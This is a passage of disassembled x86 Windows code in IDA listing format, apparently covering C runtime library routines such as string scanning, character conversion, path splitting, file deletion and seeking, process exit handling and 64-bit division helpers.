; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CF0 proc near ; CODE XREF: sub_41F338+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_417D08
push [ebp+arg_0]
call sub_4218C6 ; RtlUnwind
loc_417D08: ; DATA XREF: sub_417CF0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_417CF0 endp
; =============== S U B R O U T I N E =======================================
sub_417D10 proc near ; DATA XREF: sub_417D32+A�o
; sub_417D9A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_417D31
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_417D31: ; CODE XREF: sub_417D10+10�j
retn
sub_417D10 endp
; =============== S U B R O U T I N E =======================================
sub_417D32 proc near ; CODE XREF: sub_41F338+67�p
; sub_41F338+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_417D10
push large dword ptr fs:0
mov large fs:0, esp
loc_417D4F: ; CODE XREF: sub_417D32:loc_417D8A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_417D8C
cmp esi, [esp+1Ch+arg_4]
jz short loc_417D8C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_417D8A
push 101h
mov eax, [ebx+esi*4+8]
call sub_417DC6
call dword ptr [ebx+esi*4+8]
loc_417D8A: ; CODE XREF: sub_417D32+44�j
jmp short loc_417D4F
; ---------------------------------------------------------------------------
loc_417D8C: ; CODE XREF: sub_417D32+2A�j
; sub_417D32+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_417D32 endp
; =============== S U B R O U T I N E =======================================
sub_417D9A proc near ; CODE XREF: sub_41C8C6+55�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_417D10
jnz short locret_417DBC
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_417DBC
mov eax, 1
locret_417DBC: ; CODE XREF: sub_417D9A+10�j
; sub_417D9A+1B�j
retn
sub_417D9A endp
; =============== S U B R O U T I N E =======================================
sub_417DBD proc near ; CODE XREF: sub_41CEC0+1E�p
; sub_41CEC0+40�p
push ebx
push ecx
mov ebx, offset dword_432350
jmp short loc_417DD0
sub_417DBD endp
; =============== S U B R O U T I N E =======================================
sub_417DC6 proc near ; CODE XREF: sub_417D32+4F�p
; sub_41F338+78�p
push ebx
push ecx
mov ebx, offset dword_432350
mov ecx, [ebp+8]
loc_417DD0: ; CODE XREF: sub_417DBD+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_417DC6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417DE0 proc near ; CODE XREF: sub_407B65+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_417DE0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_417E10
loc_417E00: ; CODE XREF: sub_417E10+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_417E10
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417E10 proc near ; CODE XREF: sub_407BE6+21�p
; sub_408321+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00417E00 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_417E16: ; CODE XREF: sub_4173D0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_417E3D
loc_417E28: ; CODE XREF: sub_417E10+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_417E00
test cl, cl
jz short loc_417E86
test edx, 3
jnz short loc_417E28
loc_417E3D: ; CODE XREF: sub_417E10+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_417E48: ; CODE XREF: sub_417E10+63�j
; sub_417E10+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_417E8A
and eax, 81010100h
jz short loc_417E48
and eax, 1010100h
jnz short loc_417E84
and esi, 80000000h
jnz short loc_417E48
loc_417E84: ; CODE XREF: sub_417E10+6A�j
; sub_417E10+83�j ...
pop esi
pop edi
loc_417E86: ; CODE XREF: sub_417E10+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_417E8A: ; CODE XREF: sub_417E10+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_417EC7
test al, al
jz short loc_417E84
cmp ah, bl
jz short loc_417EC0
test ah, ah
jz short loc_417E84
shr eax, 10h
cmp al, bl
jz short loc_417EB9
test al, al
jz short loc_417E84
cmp ah, bl
jz short loc_417EB2
test ah, ah
jz short loc_417E84
jmp short loc_417E48
; ---------------------------------------------------------------------------
loc_417EB2: ; CODE XREF: sub_417E10+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417EB9: ; CODE XREF: sub_417E10+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417EC0: ; CODE XREF: sub_417E10+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417EC7: ; CODE XREF: sub_417E10+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_417E10 endp
; =============== S U B R O U T I N E =======================================
sub_417ECE proc near ; CODE XREF: sub_4081ED+55�p
; sub_4112AD+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_417ED2: ; CODE XREF: sub_417ECE+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_417ED2
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_417ECE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EE4 proc near ; CODE XREF: sub_417FDA+22�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_417FAB
mov ebx, [ebp+arg_C]
cmp ebx, esi
jz loc_417FD5
mov edi, [ebp+arg_0]
cmp [edi+14h], esi
jnz short loc_417F36
cmp ebx, esi
jbe loc_417FD5
loc_417F15: ; CODE XREF: sub_417EE4+4B�j
mov ecx, [ebp+arg_8]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_417FD5
inc eax
inc edx
inc edx
cmp eax, ebx
jb short loc_417F15
jmp loc_417FD5
; ---------------------------------------------------------------------------
loc_417F36: ; CODE XREF: sub_417EE4+27�j
mov esi, dword_4220D4
push ebx
mov ebx, [ebp+arg_8]
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_417FD4
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_417F6E
loc_417F5E: ; CODE XREF: sub_417EE4+C5�j
; sub_417EE4+EE�j
call sub_41B935
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_417FD5
; ---------------------------------------------------------------------------
loc_417F6E: ; CODE XREF: sub_417EE4+78�j
mov eax, [ebp+arg_C]
mov [ebp+var_4], eax
mov eax, ebx
loc_417F76: ; CODE XREF: sub_417EE4+AE�j
mov cl, [eax]
dec [ebp+var_4]
test cl, cl
jz short loc_417F94
mov edx, [edi+48h]
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417F8D
inc eax
loc_417F8D: ; CODE XREF: sub_417EE4+A6�j
inc eax
cmp [ebp+var_4], 0
jnz short loc_417F76
loc_417F94: ; CODE XREF: sub_417EE4+99�j
push [ebp+arg_C]
sub eax, ebx
push [ebp+arg_4]
push eax
push ebx
push 1
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_417FD5
jmp short loc_417F5E
; ---------------------------------------------------------------------------
loc_417FAB: ; CODE XREF: sub_417EE4+10�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_417FBE
push [ebp+arg_8]
call sub_419D00
pop ecx
jmp short loc_417FD5
; ---------------------------------------------------------------------------
loc_417FBE: ; CODE XREF: sub_417EE4+CD�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_8]
push 9
push dword ptr [eax+4]
call dword_4220D4 ; MultiByteToWideChar
cmp eax, esi
jz short loc_417F5E
loc_417FD4: ; CODE XREF: sub_417EE4+69�j
dec eax
loc_417FD5: ; CODE XREF: sub_417EE4+1B�j
; sub_417EE4+2B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417EE4 endp
; =============== S U B R O U T I N E =======================================
sub_417FDA proc near ; CODE XREF: sub_4081ED+19�p
; sub_4081ED+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_417FEF
call sub_419F8E
loc_417FEF: ; CODE XREF: sub_417FDA+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_417EE4
add esp, 10h
retn
sub_417FDA endp
; =============== S U B R O U T I N E =======================================
sub_418005 proc near ; CODE XREF: sub_409806+57D0�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4220E4 ; DeleteFileA
test eax, eax
jnz short loc_41801B
call dword_422004 ; RtlGetLastWin32Error
jmp short loc_41801D
; ---------------------------------------------------------------------------
loc_41801B: ; CODE XREF: sub_418005+C�j
xor eax, eax
loc_41801D: ; CODE XREF: sub_418005+14�j
test eax, eax
jz short loc_41802C
push eax
call sub_41B947
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41802C: ; CODE XREF: sub_418005+1A�j
xor eax, eax
retn
sub_418005 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802F proc near ; CODE XREF: sub_409806+4953�p
; sub_40FAD0+F6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_419D00
cmp eax, 1
pop ecx
jb short loc_41806B
cmp byte ptr [ebx+1], 3Ah
jnz short loc_41806B
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_418067
push 2
push ebx
push esi
call sub_41D469
add esp, 0Ch
and byte ptr [esi+2], 0
loc_418067: ; CODE XREF: sub_41802F+26�j
inc ebx
inc ebx
jmp short loc_418075
; ---------------------------------------------------------------------------
loc_41806B: ; CODE XREF: sub_41802F+19�j
; sub_41802F+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_418075
and byte ptr [eax], 0
loc_418075: ; CODE XREF: sub_41802F+3A�j
; sub_41802F+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_4180ED
loc_418088: ; CODE XREF: sub_41802F+88�j
mov cl, [eax]
movzx edx, cl
test byte_481701[edx], 4
jz short loc_418099
inc eax
jmp short loc_4180B3
; ---------------------------------------------------------------------------
loc_418099: ; CODE XREF: sub_41802F+65�j
cmp cl, 2Fh
jz short loc_4180AD
cmp cl, 5Ch
jz short loc_4180AD
cmp cl, 2Eh
jnz short loc_4180B3
mov [ebp+var_4], eax
jmp short loc_4180B3
; ---------------------------------------------------------------------------
loc_4180AD: ; CODE XREF: sub_41802F+6D�j
; sub_41802F+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_4180B3: ; CODE XREF: sub_41802F+68�j
; sub_41802F+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_418088
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_4180ED
cmp [ebp+arg_8], 0
jz short loc_4180E8
sub edi, ebx
cmp edi, esi
jb short loc_4180D1
mov edi, esi
loc_4180D1: ; CODE XREF: sub_41802F+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_41D469
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_4180E8: ; CODE XREF: sub_41802F+98�j
mov ebx, [ebp+arg_0]
jmp short loc_4180F7
; ---------------------------------------------------------------------------
loc_4180ED: ; CODE XREF: sub_41802F+57�j
; sub_41802F+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_4180F7
and byte ptr [ecx], 0
loc_4180F7: ; CODE XREF: sub_41802F+BC�j
; sub_41802F+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_41814A
cmp edi, ebx
jb short loc_41814A
cmp [ebp+arg_C], 0
jz short loc_418127
sub edi, ebx
cmp edi, esi
jb short loc_418110
mov edi, esi
loc_418110: ; CODE XREF: sub_41802F+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_41D469
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_418127: ; CODE XREF: sub_41802F+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_418172
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_418137
mov esi, eax
loc_418137: ; CODE XREF: sub_41802F+104�j
push esi
push [ebp+var_4]
push edi
call sub_41D469
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_418172
; ---------------------------------------------------------------------------
loc_41814A: ; CODE XREF: sub_41802F+CD�j
; sub_41802F+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_418168
sub eax, ebx
cmp eax, esi
jnb short loc_418159
mov esi, eax
loc_418159: ; CODE XREF: sub_41802F+126�j
push esi
push ebx
push edi
call sub_41D469
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_418168: ; CODE XREF: sub_41802F+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_418172
and byte ptr [eax], 0
loc_418172: ; CODE XREF: sub_41802F+FD�j
; sub_41802F+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41802F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418177 proc near ; CODE XREF: sub_409806+3CFF�p
; sub_409806+3D2C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 18h
push offset stru_42BE58
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov edi, ebx
mov [ebp+var_1C], ebx
cmp [ebp+arg_4], 0
jg short loc_418195
xor eax, eax
jmp short loc_4181EC
; ---------------------------------------------------------------------------
loc_418195: ; CODE XREF: sub_418177+18�j
mov esi, [ebp+arg_8]
mov [ebp+var_20], esi
push esi
call sub_41B092
pop ecx
and [ebp+ms_exc.disabled], 0
loc_4181A6: ; CODE XREF: sub_418177+64�j
dec [ebp+arg_4]
jz short loc_4181DD
dec dword ptr [esi+4]
js short loc_4181BA
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_4181C1
; ---------------------------------------------------------------------------
loc_4181BA: ; CODE XREF: sub_418177+37�j
push esi
call sub_41B136
pop ecx
loc_4181C1: ; CODE XREF: sub_418177+41�j
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jnz short loc_4181D3
cmp edi, ebx
jnz short loc_4181DD
and [ebp+var_1C], 0
jmp short loc_4181E0
; ---------------------------------------------------------------------------
loc_4181D3: ; CODE XREF: sub_418177+50�j
mov [edi], al
inc edi
mov [ebp+var_28], edi
cmp al, 0Ah
jnz short loc_4181A6
loc_4181DD: ; CODE XREF: sub_418177+32�j
; sub_418177+54�j
and byte ptr [edi], 0
loc_4181E0: ; CODE XREF: sub_418177+5A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4181F5
mov eax, [ebp+var_1C]
loc_4181EC: ; CODE XREF: sub_418177+1C�j
call __SEH_epilog
retn
sub_418177 endp
; =============== S U B R O U T I N E =======================================
sub_4181F2 proc near ; DATA XREF: .text:stru_42BE58�o
mov esi, [ebp-20h]
sub_4181F2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4181F5 proc near ; CODE XREF: sub_418177+6D�p
push esi
call sub_41B0E4
pop ecx
retn
sub_4181F5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418200 proc near ; CODE XREF: sub_409806+8D7�p
; sub_4131EE+285�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_418232
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_418230
jz short loc_418232
sub ecx, 2
loc_418230: ; CODE XREF: sub_418200+29�j
not ecx
loc_418232: ; CODE XREF: sub_418200+9�j
; sub_418200+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_418200 endp
; =============== S U B R O U T I N E =======================================
sub_418239 proc near ; CODE XREF: sub_4182E0+CB�p
; sub_41860F+1C�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call dword_4220A4 ; GetModuleHandleA
test eax, eax
jz short loc_41825E
push offset aCorexitprocess ; "CorExitProcess"
push eax
call dword_422084 ; GetProcAddress
test eax, eax
jz short loc_41825E
push [esp+arg_0]
call eax ; dword_42E030
loc_41825E: ; CODE XREF: sub_418239+D�j
; sub_418239+1D�j
push [esp+arg_0]
call dword_422040 ; ExitProcess
int 3 ; Trap to Debugger
loc_418269: ; CODE XREF: sub_41D5A4+C�p
push 8
call sub_41A166
pop ecx
retn
sub_418239 endp
; =============== S U B R O U T I N E =======================================
sub_418272 proc near ; CODE XREF: sub_41D5D6�p
push 8
call sub_41A0D2
pop ecx
retn
sub_418272 endp
; =============== S U B R O U T I N E =======================================
sub_41827B proc near ; CODE XREF: .text:loc_41876F�p
mov eax, off_432338
test eax, eax
jz short loc_418286
call eax ; sub_41721D
loc_418286: ; CODE XREF: sub_41827B+7�j
push esi
push edi
mov ecx, offset dword_42E00C
mov edi, offset dword_42E020
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_4182B1
loc_41829A: ; CODE XREF: sub_41827B+30�j
test eax, eax
jnz short loc_4182DD
mov ecx, [esi]
test ecx, ecx
jz short loc_4182A6
call ecx
loc_4182A6: ; CODE XREF: sub_41827B+27�j
add esi, 4
cmp esi, edi
jb short loc_41829A
test eax, eax
jnz short loc_4182DD
loc_4182B1: ; CODE XREF: sub_41827B+1D�j
push offset sub_41D632
call sub_41D5DC
mov esi, offset dword_42E000
mov eax, esi
mov edi, offset dword_42E008
cmp eax, edi
pop ecx
jnb short loc_4182DB
loc_4182CC: ; CODE XREF: sub_41827B+5E�j
mov eax, [esi]
test eax, eax
jz short loc_4182D4
call eax
loc_4182D4: ; CODE XREF: sub_41827B+55�j
add esi, 4
cmp esi, edi
jb short loc_4182CC
loc_4182DB: ; CODE XREF: sub_41827B+4F�j
xor eax, eax
loc_4182DD: ; CODE XREF: sub_41827B+21�j
; sub_41827B+34�j
pop edi
pop esi
retn
sub_41827B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182E0 proc near ; CODE XREF: sub_4183B3+8�p
; sub_4183C4+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push 8
call sub_41A166
xor esi, esi
inc esi
cmp dword_4811A4, esi
pop ecx
jnz short loc_418308
push [ebp+arg_0]
call dword_4220E0 ; GetCurrentProcess
push eax
call dword_4220E8 ; TerminateProcess
loc_418308: ; CODE XREF: sub_4182E0+16�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_4811A0, esi
mov byte_48119C, al
jnz short loc_41836E
mov ecx, dword_482974
test ecx, ecx
jz short loc_41834F
mov eax, dword_482970
sub eax, 4
cmp eax, ecx
jmp short loc_418348
; ---------------------------------------------------------------------------
loc_418332: ; CODE XREF: sub_4182E0+6D�j
mov eax, [eax]
test eax, eax
jz short loc_41833A
call eax
loc_41833A: ; CODE XREF: sub_4182E0+56�j
mov eax, dword_482970
sub eax, 4
cmp eax, dword_482974
loc_418348: ; CODE XREF: sub_4182E0+50�j
mov dword_482970, eax
jnb short loc_418332
loc_41834F: ; CODE XREF: sub_4182E0+44�j
mov eax, offset dword_42E024
mov esi, offset dword_42E02C
cmp eax, esi
mov edi, eax
jnb short loc_41836E
loc_41835F: ; CODE XREF: sub_4182E0+8C�j
mov eax, [edi]
test eax, eax
jz short loc_418367
call eax
loc_418367: ; CODE XREF: sub_4182E0+83�j
add edi, 4
cmp edi, esi
jb short loc_41835F
loc_41836E: ; CODE XREF: sub_4182E0+3A�j
; sub_4182E0+7D�j
mov eax, offset dword_42E030
mov esi, offset dword_42E038
cmp eax, esi
mov edi, eax
jnb short loc_41838D
loc_41837E: ; CODE XREF: sub_4182E0+AB�j
mov eax, [edi]
test eax, eax
jz short loc_418386
call eax
loc_418386: ; CODE XREF: sub_4182E0+A2�j
add edi, 4
cmp edi, esi
jb short loc_41837E
loc_41838D: ; CODE XREF: sub_4182E0+9C�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_41839E
push 8
call sub_41A0D2
jmp short loc_4183B0
; ---------------------------------------------------------------------------
loc_41839E: ; CODE XREF: sub_4182E0+B3�j
push [ebp+arg_0]
mov dword_4811A4, 1
call sub_418239
loc_4183B0: ; CODE XREF: sub_4182E0+BC�j
pop ecx
pop ebp
retn
sub_4182E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4183B3 proc near ; CODE XREF: .text:004187BF�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_4182E0
add esp, 0Ch
retn
sub_4183B3 endp
; =============== S U B R O U T I N E =======================================
sub_4183C4 proc near ; CODE XREF: sub_4185EA+1C�p
; .text:004187EC�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_4182E0
add esp, 0Ch
retn
sub_4183C4 endp
; =============== S U B R O U T I N E =======================================
sub_4183D5 proc near ; CODE XREF: .text:loc_4187C4�p
push 1
push 0
push 0
call sub_4182E0
add esp, 0Ch
retn
sub_4183D5 endp
; =============== S U B R O U T I N E =======================================
sub_4183E4 proc near ; CODE XREF: .text:loc_4187F1�p
push 1
push 1
push 0
call sub_4182E0
add esp, 0Ch
retn
sub_4183E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418400 proc near ; CODE XREF: sub_412A38+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_418421
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_418471
; ---------------------------------------------------------------------------
loc_418421: ; CODE XREF: sub_418400+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41842F: ; CODE XREF: sub_418400+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41842F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41845A
cmp edx, [esp+4+arg_4]
ja short loc_41845A
jb short loc_418462
cmp eax, [esp+4+arg_0]
jbe short loc_418462
loc_41845A: ; CODE XREF: sub_418400+4A�j
; sub_418400+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_418462: ; CODE XREF: sub_418400+52�j
; sub_418400+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_418471: ; CODE XREF: sub_418400+1F�j
pop ebx
retn 10h
sub_418400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418480 proc near ; CODE XREF: sub_412A38+24�p
; sub_417740+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_4184A2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4184E3
; ---------------------------------------------------------------------------
loc_4184A2: ; CODE XREF: sub_418480+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4184B0: ; CODE XREF: sub_418480+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4184B0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4184DE
cmp edx, [esp+8+arg_4]
ja short loc_4184DE
jb short loc_4184DF
cmp eax, [esp+8+arg_0]
jbe short loc_4184DF
loc_4184DE: ; CODE XREF: sub_418480+4E�j
; sub_418480+54�j
dec esi
loc_4184DF: ; CODE XREF: sub_418480+56�j
; sub_418480+5C�j
xor edx, edx
mov eax, esi
loc_4184E3: ; CODE XREF: sub_418480+20�j
pop esi
pop ebx
retn 10h
sub_418480 endp
; =============== S U B R O U T I N E =======================================
sub_4184E8 proc near ; CODE XREF: sub_418577+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_418566
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_418507
cmp edi, 1
jz short loc_418507
cmp edi, 2
jnz short loc_418566
loc_418507: ; CODE XREF: sub_4184E8+13�j
; sub_4184E8+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_41851F
push esi
call sub_41D795
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_41851F: ; CODE XREF: sub_4184E8+28�j
push esi
call sub_41AE6C
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_418535
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_418549
; ---------------------------------------------------------------------------
loc_418535: ; CODE XREF: sub_4184E8+43�j
test al, 1
jz short loc_418549
test al, 8
jz short loc_418549
test ah, 4
jnz short loc_418549
mov dword ptr [esi+18h], 200h
loc_418549: ; CODE XREF: sub_4184E8+4B�j
; sub_4184E8+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41D6EA
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_418574
; ---------------------------------------------------------------------------
loc_418566: ; CODE XREF: sub_4184E8+B�j
; sub_4184E8+1D�j
call sub_41B935
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_418574: ; CODE XREF: sub_4184E8+7C�j
pop edi
pop esi
retn
sub_4184E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418577 proc near ; CODE XREF: sub_4131EE+2C6�p
; sub_4131EE+402�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset stru_42BE80
call __SEH_prolog
push [ebp+arg_0]
call sub_41B092
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_8]
